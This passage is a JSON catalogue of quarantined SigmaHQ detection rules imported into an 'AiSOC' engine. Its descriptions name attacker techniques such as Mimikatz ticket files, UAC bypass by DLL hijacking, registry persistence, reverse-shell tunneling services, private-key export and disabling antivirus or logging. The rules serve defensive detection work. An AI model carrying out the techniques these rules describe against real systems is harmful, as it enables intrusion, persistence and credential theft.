"detections/sigma-imports/_quarantine/remote-code-execute-via-winrm-vbs.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": 
"9df0dd3a-1a5c-47e3-a2bc-30ed177646a0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_winrm_execution_via_scripting_api_winrm_vbs.yml" } }, { "id": "sigmahq-sigma-9df5f547-c86a-433e-b533-f2794357e242", "type": "detection", "name": "Classes Autorun Keys Modification", "description": "Detects modification of Windows Registry Classes keys used for persistence.\nAdversaries modify these autostart extensibility points (ASEP) to execute malicious code when file types are opened or actions are performed.\nVarious legitimate software also uses these keys. Currently, this rule only filters out known legitimate software paths,\nthus it is recommended to review and tune filters for your environment to reduce false positives before deploying to production.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1547.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/classes-autorun-keys-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9df5f547-c86a-433e-b533-f2794357e242", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_classes.yml" } }, { "id": "sigmahq-sigma-9e02c8ec-02b9-43e8-81eb-34a475ba7965", "type": "detection", "name": "Network Connection Initiated To BTunnels Domains", "description": "Detects network connections to BTunnels domains initiated by a process on the 
system.\nAttackers can abuse such tunneling services to expose a compromised host, establish a reverse shell, or maintain persistence on a machine.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1567", "T1572" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/network-connection-initiated-to-btunnels-domains.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9e02c8ec-02b9-43e8-81eb-34a475ba7965", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/network_connection/net_connection_win_domain_btunnels.yml" } }, { "id": "sigmahq-sigma-9e07f6e7-83aa-45c6-998e-0af26efd0a85", "type": "detection", "name": "Powershell WMI Persistence", "description": "Detects PowerShell script activity that creates a Windows Management Instrumentation (WMI) event subscription. Adversaries may establish persistence and elevate privileges by executing malicious content triggered by such a subscription.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1546.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-wmi-persistence.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9e07f6e7-83aa-45c6-998e-0af26efd0a85", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/powershell/powershell_script/posh_ps_wmi_persistence.yml" } }, { "id": "sigmahq-sigma-9e099d99-44c2-42b6-a6d8-54c3545cab29", "type": "detection", "name": "HackTool - Mimikatz Kirbi File Creation", "description": "Detects the creation of files created by mimikatz such as \".kirbi\", \"mimilsa.log\", etc.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1558" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-mimikatz-kirbi-file-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9e099d99-44c2-42b6-a6d8-54c3545cab29", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_hktl_mimikatz_files.yml" } }, { "id": "sigmahq-sigma-9e1a1fdf-ee58-40ce-8e15-b66ca5a80e1f", "type": "detection", "name": "Previously Installed IIS Module Was Removed", "description": "Detects the removal of a previously installed IIS module.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1685.001", "T1505.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/previously-installed-iis-module-was-removed.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9e1a1fdf-ee58-40ce-8e15-b66ca5a80e1f", "source_commit": "df5c6a6", "license": "DRL-1.1", 
"license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/iis-configuration/win_iis_module_removed.yml" } }, { "id": "sigmahq-sigma-9e1bef8d-0fff-46f6-8465-9aa54e128c1e", "type": "detection", "name": "Use Of Hidden Paths Or Files", "description": "Detects calls to hidden files or files located in hidden directories in NIX systems.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/use-of-hidden-paths-or-files.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9e1bef8d-0fff-46f6-8465-9aa54e128c1e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/auditd/path/lnx_auditd_hidden_binary_execution.yml" } }, { "id": "sigmahq-sigma-9e2575e7-2cb9-4da1-adc8-ed94221dca5e", "type": "detection", "name": "New Firewall Rule Added In Windows Firewall Exception List For Potential Suspicious Application", "description": "Detects the addition of a new rule to the Windows Firewall exception list for an application located in a potentially suspicious location.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1686.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-firewall-rule-added-in-windows-firewall-exception-list-for-potential-suspici.yaml", "quarantine_reason": "imported 
rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9e2575e7-2cb9-4da1-adc8-ed94221dca5e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/firewall_as/win_firewall_as_add_rule_susp_folder.yml" } }, { "id": "sigmahq-sigma-9e3357ba-09d4-4fbd-a7c5-ad6386314513", "type": "detection", "name": "Change the Fax Dll", "description": "Detects possible persistence via modification of the Fax service DLL registry value; the referenced DLL is loaded when the Fax service restarts", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/change-the-fax-dll.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9e3357ba-09d4-4fbd-a7c5-ad6386314513", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_fax_dll_persistance.yml" } }, { "id": "sigmahq-sigma-9e36ed87-4986-482e-8e3b-5c23ffff11bf", "type": "detection", "name": "RemCom Service Installation", "description": "Detects RemCom service installation and execution events", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1569.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remcom-service-installation.yaml", "quarantine_reason": "imported 
rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9e36ed87-4986-482e-8e3b-5c23ffff11bf", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/service_control_manager/win_system_service_install_remcom.yml" } }, { "id": "sigmahq-sigma-9e3cb244-bdb8-4632-8c90-6079c8f4f16d", "type": "detection", "name": "Important Scheduled Task Deleted or Disabled", "description": "Detects when adversaries try to stop system services or processes by deleting or disabling their respective scheduled tasks in order to conduct data destructive activities", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1489" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/important-scheduled-task-deleted-or-disabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9e3cb244-bdb8-4632-8c90-6079c8f4f16d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/taskscheduler/win_taskscheduler_susp_schtasks_delete_or_disable.yml" } }, { "id": "sigmahq-sigma-9e4b7d3a-6f2c-4e9a-8d1b-3c5e7a9f2b4d", "type": "detection", "name": "Potentially Suspicious File Creation by OpenEDR's ITSMService", "description": "Detects the creation of potentially suspicious files by OpenEDR's ITSMService process.\nThe ITSMService is responsible for remote management operations and can create files on the system through the Process Explorer or file 
management features.\nWhile legitimate for IT operations, creation of executable or script files could indicate unauthorized file uploads, data staging, or malicious file deployment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1105", "T1570", "T1219" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-suspicious-file-creation-by-openedr-s-itsmservice.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9e4b7d3a-6f2c-4e9a-8d1b-3c5e7a9f2b4d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_comodo_itsm_potentially_suspicious_file_creation.yml" } }, { "id": "sigmahq-sigma-9e50a8b3-dd05-4eb8-9153-bdb6b79d50b0", "type": "detection", "name": "Msxsl.EXE Execution", "description": "Detects the execution of the MSXSL utility. This can be used to execute Extensible Stylesheet Language (XSL) files. 
These files are commonly used to describe the processing and rendering of data within XML files.\nAdversaries can abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1220" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/msxsl-exe-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9e50a8b3-dd05-4eb8-9153-bdb6b79d50b0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_msxsl_execution.yml" } }, { "id": "sigmahq-sigma-9e620995-f2d8-4630-8430-4afd89f77604", "type": "detection", "name": "Potential Active Directory Enumeration Using AD Module - PsScript", "description": "Detects usage of the \"Import-Module\" cmdlet to load the \"Microsoft.ActiveDirectory.Management.dll\" DLL. 
Which is often used by attackers to perform AD enumeration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-active-directory-enumeration-using-ad-module-psscript.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9e620995-f2d8-4630-8430-4afd89f77604", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_active_directory_module_dll_import.yml" } }, { "id": "sigmahq-sigma-9e716b33-63b2-46da-86a4-bd3c3b9b5dfb", "type": "detection", "name": "Certificate Exported Via PowerShell", "description": "Detects calls to cmdlets that are used to export certificates from the local certificate store. 
Threat actors were seen abusing this to steal private keys from compromised machines.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1552.004", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/certificate-exported-via-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9e716b33-63b2-46da-86a4-bd3c3b9b5dfb", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_export_certificate.yml" } }, { "id": "sigmahq-sigma-9e8894c0-0ae0-11ef-9d85-1f2942bec57c", "type": "detection", "name": "Suspicious Shell Open Command Registry Modification", "description": "Detects modifications to shell open registry keys that point to suspicious locations typically used by malware for persistence.\nGenerally, modifications to the `*\\shell\\open\\command` registry key can indicate an attempt to change the default action for opening files,\nand various UAC bypass or persistence techniques involve modifying these keys to execute malicious scripts or binaries.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.002", "T1546.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-shell-open-command-registry-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", 
"provenance": { "source": "SigmaHQ/sigma", "source_id": "9e8894c0-0ae0-11ef-9d85-1f2942bec57c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_susp_shell_open_keys_modification_patterns.yml" } }, { "id": "sigmahq-sigma-9e8f6035-88bf-4a63-96b6-b17c0508257e", "type": "detection", "name": "Cisco Disabling Logging", "description": "Detects Cisco CLI commands that turn off logging, either locally on the device or to a remote logging destination, which removes audit visibility of subsequent activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/cisco-disabling-logging.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9e8f6035-88bf-4a63-96b6-b17c0508257e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/network/cisco/aaa/cisco_cli_disable_logging.yml" } }, { "id": "sigmahq-sigma-9e9a9002-56c4-40fd-9eff-e4b09bfa5f6c", "type": "detection", "name": "DLL Load By System Process From Suspicious Locations", "description": "Detects when a system process (i.e. located in system32, syswow64, etc.) 
loads a DLL from a suspicious location or a location with permissive permissions such as \"C:\\Users\\Public\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dll-load-by-system-process-from-suspicious-locations.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9e9a9002-56c4-40fd-9eff-e4b09bfa5f6c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_susp_dll_load_system_process.yml" } }, { "id": "sigmahq-sigma-9eb68894-7476-4cd6-8752-23b51f5883a7", "type": "detection", "name": "Bitsadmin to Uncommon TLD", "description": "Detects Bitsadmin connections to domains with uncommon TLDs", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1071.001", "T1197" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/bitsadmin-to-uncommon-tld.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9eb68894-7476-4cd6-8752-23b51f5883a7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/web/proxy_generic/proxy_ua_bitsadmin_susp_tld.yml" } }, { "id": "sigmahq-sigma-9eb99343-d336-4020-a3cd-67f3819e68ee", 
"type": "detection", "name": "Account Tampering - Suspicious Failed Logon Reasons", "description": "This method uses uncommon error codes on failed logons to determine suspicious activity and tampering with accounts that have been disabled or somehow restricted.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/account-tampering-suspicious-failed-logon-reasons.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9eb99343-d336-4020-a3cd-67f3819e68ee", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_susp_failed_logon_reasons.yml" } }, { "id": "sigmahq-sigma-9ec9fb1b-e059-4489-9642-f270c207923d", "type": "detection", "name": "Hiding User Account Via SpecialAccounts Registry Key - CommandLine", "description": "Detects changes to the registry key \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\Userlist\" where the value is set to \"0\" in order to hide user account from being listed on the logon screen.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1564.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hiding-user-account-via-specialaccounts-registry-key-commandline.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC 
engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9ec9fb1b-e059-4489-9642-f270c207923d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_registry_special_accounts_hide_user.yml" } }, { "id": "sigmahq-sigma-9ed5959a-c43c-4c59-84e3-d28628429456", "type": "detection", "name": "UAC Bypass Using Iscsicpl - ImageLoad", "description": "Detects the \"iscsicpl.exe\" UAC bypass technique, which leverages DLL search order hijacking to load a custom DLL from a temp directory or any other user-controlled location in the user's %PATH%", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uac-bypass-using-iscsicpl-imageload.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9ed5959a-c43c-4c59-84e3-d28628429456", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_uac_bypass_iscsicpl.yml" } }, { "id": "sigmahq-sigma-9ef27c24-4903-4192-881a-3adde7ff92a5", "type": "detection", "name": "Renamed Remote Utilities RAT (RURAT) Execution", "description": "Detects execution of a renamed Remote Utilities (RURAT) binary by matching the Product field of the PE version header rather than the file name", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", 
"enabled": false, "path": "detections/sigma-imports/_quarantine/renamed-remote-utilities-rat-rurat-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9ef27c24-4903-4192-881a-3adde7ff92a5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_renamed_rurat.yml" } }, { "id": "sigmahq-sigma-9f0a8bf3-a65b-440a-8c1e-5cb1547c8e70", "type": "detection", "name": "New DLL Registered Via Odbcconf.EXE", "description": "Detects execution of \"odbcconf\" with \"REGSVR\" in order to register a new DLL (equivalent to running regsvr32). Attackers abuse this to install and run malicious DLLs.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.008" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-dll-registered-via-odbcconf-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9f0a8bf3-a65b-440a-8c1e-5cb1547c8e70", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_odbcconf_register_dll_regsvr.yml" } }, { "id": "sigmahq-sigma-9f107a84-532c-41af-b005-8d12a607639f", "type": "detection", "name": "Potentially Suspicious Cabinet File Expansion", "description": "Detects the expansion or decompression of cabinet files from potentially suspicious or uncommon locations, e.g. 
seen in Iranian MeteorExpress related attacks", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-suspicious-cabinet-file-expansion.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9f107a84-532c-41af-b005-8d12a607639f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_expand_cabinet_files.yml" } }, { "id": "sigmahq-sigma-9f2cc74d-78af-4eb2-bb64-9cd1d292b87b", "type": "detection", "name": "Microsoft Sync Center Suspicious Network Connections", "description": "Detects suspicious connections from Microsoft Sync Center to non-private IPs.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1055", "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/microsoft-sync-center-suspicious-network-connections.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9f2cc74d-78af-4eb2-bb64-9cd1d292b87b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/network_connection/net_connection_win_susp_outbound_mobsync_connection.yml" } }, { "id": 
"sigmahq-sigma-9f308120-69ed-4506-abde-ac6da81f4310", "type": "detection", "name": "Okta Network Zone Deactivated or Deleted", "description": "Detects when an Okta Network Zone is deactivated or deleted. Network Zones back IP- and network-based sign-on and access policies, so removing one can silently relax those controls.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.identity" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/okta-network-zone-deactivated-or-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9f308120-69ed-4506-abde-ac6da81f4310", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/identity/okta/okta_network_zone_deactivated_or_deleted.yml" } }, { "id": "sigmahq-sigma-9f383dc0-fdeb-4d56-acbc-9f9f4f8f20f3", "type": "detection", "name": "Unusual File Modification by dns.exe", "description": "Detects an unexpected file being modified by dns.exe, which may indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1133" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/unusual-file-modification-by-dns-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9f383dc0-fdeb-4d56-acbc-9f9f4f8f20f3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": 
"https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_change/file_change_win_unusual_modification_by_dns_exe.yml" } }, { "id": "sigmahq-sigma-9f38c1db-e2ae-40bf-81d0-5b68f73fb512", "type": "detection", "name": "Suspicious BitLocker Access Agent Update Utility Execution", "description": "Detects the execution of the BitLocker Access Agent Update Utility (baaupdate.exe) which is not a common parent process for other processes.\nSuspicious child processes spawned by baaupdate.exe could indicate an attempt at lateral movement via BitLocker DCOM & COM Hijacking.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218", "T1021.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-bitlocker-access-agent-update-utility-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9f38c1db-e2ae-40bf-81d0-5b68f73fb512", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_baaupdate_susp_child_process.yml" } }, { "id": "sigmahq-sigma-9f4662ac-17ca-43aa-8f12-5d7b989d0101", "type": "detection", "name": "Tamper With Sophos AV Registry Keys", "description": "Detects attempts to tamper with Sophos AV functionality by modifying its registry keys, a common step before disabling or evading endpoint protection", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
